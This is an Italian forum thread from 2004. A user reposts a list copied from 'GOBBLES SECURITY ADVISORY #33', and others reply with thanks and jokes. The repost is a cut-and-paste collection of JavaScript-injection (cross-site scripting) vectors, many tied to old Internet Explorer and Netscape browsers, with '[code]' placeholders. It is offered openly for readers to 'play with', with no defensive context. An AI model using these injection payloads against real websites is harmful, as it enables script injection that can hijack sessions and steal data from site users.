I Compleanni di Oggi |
۰ Oggi non si puo' festeggiare nessuno...
|
|
Biblioteca di Non Solo Cuneo
|
|
Stai leggendo il capitolo: Codice html ... e hack Scritto da
Marco
|
|
|
Attenzione, per accedere alle funzioni bisogna essere iscritti.
|
Persona |
Titolo |
Marco
4/6/2004
23.09.53
|
----Copied from GOBBLES SECURITY ADVISORY #33----
Here is a cut-n-paste collection of typical JavaScript-injection hacks
you may derive some glee from playing with.
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]"> [IE]
<input type="image" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
&<script>[code]
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img src="livescript:[code]"> [N4]
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code] [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style></script>
<![CDATA[</script>
<!-- -- --><script>[code]</script>
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><script>[code]</script>;
<div datafld="b" dataformatas="html" datasrc="#X">
[\xC0][\xXBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]
----Copied from GOBBLES SECURITY ADVISORY #33----
Bye
|
Dragos
1/6/2004
23.17.09
|
Grazie marco. ci hai riempiti di novità. Grazie Grazie
|
Simo++
4/6/2004
13.57.11
|
Ma e' CInese?
|
Simo++
4/6/2004
13.57.22
|
Ma e' CInese?
|
Dragos
4/6/2004
23.09.53
|
Ma muori... che cinese!!! non ofendere è tutta roba per intenditori.
|
|
.:Premi il tasto "Indietro" per tornare alla pagina precedente.
|
Attenzione, per accedere alle funzioni bisogna essere iscritti.
|
|